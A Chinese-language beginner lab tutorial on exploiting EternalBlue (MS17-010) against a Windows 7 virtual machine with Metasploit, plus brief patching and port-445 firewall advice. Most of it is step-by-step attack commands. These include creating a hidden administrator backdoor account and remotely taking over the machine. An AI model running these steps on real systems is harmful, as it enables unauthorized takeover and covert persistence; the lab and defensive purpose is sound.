利用永恆之藍滲透win7 (低配版)
環境:
攻擊機: kali linux2.0系統
(https://www.kali.org/downloads/)
靶 機: window7(鏈接:http://pan.baidu.com/s/1jIzOqRc 密碼:vz8p)
或window server 2008
漏 洞:永恆之藍
步驟:
(這里實際操作時,我會用ssh遠程連接kali 操作,ssh的使用就不介紹了,自己搜)
第一步:打開metasploit
命令:root@kali:~# msfconsole
第二步:
使用永恆之藍模塊,
命令:
root@kali:~# search ms17-01
root@kali:~# use
第三步:
填充各種指令,主要是靶機IP,其中445端口已經默認了,其他不用改
命令:
root@kali:~# show options
root@kali:~# set RHOST 172.19.120.68
第四步:
攻擊
命令:
root@kali:~# exploit 或者run
顯示以及拿到靶機的控制權,
第五步:
創建新用戶,偷偷的控制使用,
命令:
net user admin 123456 /add
第六步:
提權,將新創建的用戶admin提到管理員權限
命令:
net localgroup administrators admin /add
查看權限:
net user admin
第六步:
遠程連接 admin 用戶
滲透成功,接下來你就可以做你想做的了。
防御辦法:
1,網上下載補丁,
2,關閉445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
檢測445端口是否開啟:
netstat -ano -p tcp | find “445”
總結:
實驗過程遇到好多問題,解決辦法:先自己各種嘗試,在上網搜相關知識,最后還不會,就去請教大神。
另外這個實驗比較簡單,局限性較大,可以作為入門使用,網上好像有永恆之藍漏洞的復現,使用python 來做的,暫時還不太懂,等有機會自己也去嘗試嘗試。